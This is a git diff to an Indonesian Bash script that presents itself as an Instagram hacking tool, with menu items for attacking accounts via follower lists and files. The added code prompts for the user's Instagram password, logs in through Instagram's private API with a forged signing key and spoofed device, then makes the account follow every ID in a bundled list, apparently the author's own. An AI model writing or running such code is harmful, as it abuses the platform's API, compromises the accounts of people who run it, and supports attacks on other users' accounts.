Update ib

diff --git a/ib b/ib
--- a/ib
+++ b/ib
@@ -40,14 +40,14 @@ BLG="\033[44;1m"
 menu(){
 
 banner
-echo -e "${G}[${W}1${G}]${W}.${Y} Hack Instagram Followers User"
-echo -e "${G}[${W}2${G}]${W}.${Y} Hack Instagram Following User"
+echo -e "${G}[${W}1${G}]${W}.${Y} Hack Instagram Followers User (Masih Ada Bug)"
+echo -e "${G}[${W}2${G}]${W}.${Y} Hack Instagram Following User (Masih Ada Bug)"
 echo -e "${G}[${W}3${G}]${W}.${Y} Hack Instagram From List File"
 echo -e "${G}[${W}4${G}]${W}.${Y} Hack Instagram Pake J-Query Automatis"
 echo -e "${G}[${W}0${G}]${W}.${R} Exit"
 echo ""
 echo -ne "${G}[${W}*${G}]${Y}Pilih metode serangan : ${W}" ; read mnu
-if [[ "mnu" == 1 ]]; then
+if [[ $mnu == 1 ]]; then
 clear
 banner
 hack_followers
@@ -90,7 +90,131 @@ echo -e "${G}Y88888P${Y} Y888888P${G} YP  YP  YP${Y} Y888888P${G}    YP    "
 echo ""
 }
 
+gas(){
+menu
+}
 
+follow() {
+
+username_id=$(curl -L -s 'https://www.instagram.com/'$user'' > getid && grep -o  'profilePage_[0-9]*.' getid | cut -d "_" -f2 | tr -d '"')
+
+user_id=$(curl -L -s 'https://www.instagram.com/'$user_account'' > getid && grep -o  'profilePage_[0-9]*.' getid | cut -d "_" -f2 | tr -d '"')
+data='{"_uuid":"'$guid'", "_uid":"'$username_id'", "user_id":"'$user_id'", "_csrftoken":"'$var2'"}'
+hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
+curl -L -b cookie -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/friendships/create/$user_id/" 
+
+
+}
+
+
+
+follow12(){
+
+for celeb in $(cat f/roy); do
+
+data12='{"_uuid":"'$guid'", "_uid":"'$username_id'", "user_id":"'$celeb'", "_csrftoken":"'$var2'"}'
+hmac12=$(echo -n "$data12" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
+check_follow=$(curl -s -L -b cookie.$user12 -d "ig_sig_key_version=4&signed_body=$hmac12.$data12" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/friendships/create/$celeb/" | grep -o '"following": true')
+
+if [[ $check_follow == "" ]]; then
+printf "\n\e[1;93m [!] Error\n"
+exit 1
+else
+printf "\e[1;92mOK\e[0m\n"
+sleep 2
+clear
+gas
+fi
+
+sleep 3
+
+done
+
+
+}
+
+
+
+
+cek(){
+FILE=l/o/g/i/n/login.txt
+if [[ -f "$FILE" ]]; then
+echo -e "${G}FILE DAH DIBUAT TOD"
+sleep 2
+else
+    
+mkdir l
+mkdir l/o
+mkdir l/o/g
+mkdir l/o/g/i
+mkdir l/o/g/i/n
+touch l/o/g/i/n/login.txt
+echo -e "${G}FILE BaRU DIBUAT TOD"
+sleep 2
+fi
+
+
+if [[ $(cat l/o/g/i/n/login.txt) == "royazizbarera" ]] ;then
+echo -e "${G}Oke lu udah login Instagram lu, ${W}Gass lah"
+sleep 2
+clear 
+gas
+else
+echo -e "${M}Lu belum pernah login ya tot"
+echo -e "${B}Login DUlu Yak, hayyuk${W}"
+sleep 4
+clear
+banner
+login12
+fi
+}
+
+
+
+
+
+login12() {
+
+
+printf "\e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;93m Login Instagram\e[0m\n"
+
+read -p $'\e[1;31m[\e[0m\e[1;77m+\e[0m\e[1;31m]\e[0m\e[1;93m Username: \e[0m' user12
+
+read -p $'\e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;93m Password: \e[0m' pass12
+
+printf "\n"
+
+data12='{"phone_id":"'$phone'", "_csrftoken":"'$var2'", "username":"'$user12'", "guid":"'$guid'", "device_id":"'$device'", "password":"'$pass12'", "login_attempt_count":"0"}'
+
+IFS=$'\n'
+
+hmac12=$(echo -n "$data12" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
+useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'
+
+printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] Trying to login as\e[0m\e[1;93m %s\e[0m\n" $user12
+IFS=$'\n'
+var12=$(curl -c cookie.$user12 -d "ig_sig_key_version=4&signed_body=$hmac12.$data12" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "logged_in_user\|challenge\|many tries\|Please wait" | uniq ); 
+if [[ $var12 == "challenge" ]]; then 
+printf "\e[1;93m\n[!] Mampus kena sesi\n" ; exit 1; 
+
+elif [[ $var12 == "logged_in_user" ]]; then 
+printf "\e[1;92m \n[+] Login Sukses\n" ; 
+printf royazizbarera >> l/o/g/i/n/login.txt
+sleep 3
+clear
+follow12
+
+elif [[ $var12 == "Please wait" ]]; then 
+echo "Yahahaha hayuuk"; 
+
+else
+echo -e "${R}Aowkwokwokwokwok gagal login, \n Ulangi lagi ${W}"
+sleep 3
+clear
+banner
+login12
+fi
+}
 
 hack_list(){
 login_user() {
@@ -203,30 +327,9 @@ done
 }
 
 
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
 clear
-menu
+
+banner
+cek
+#login12
+#menu
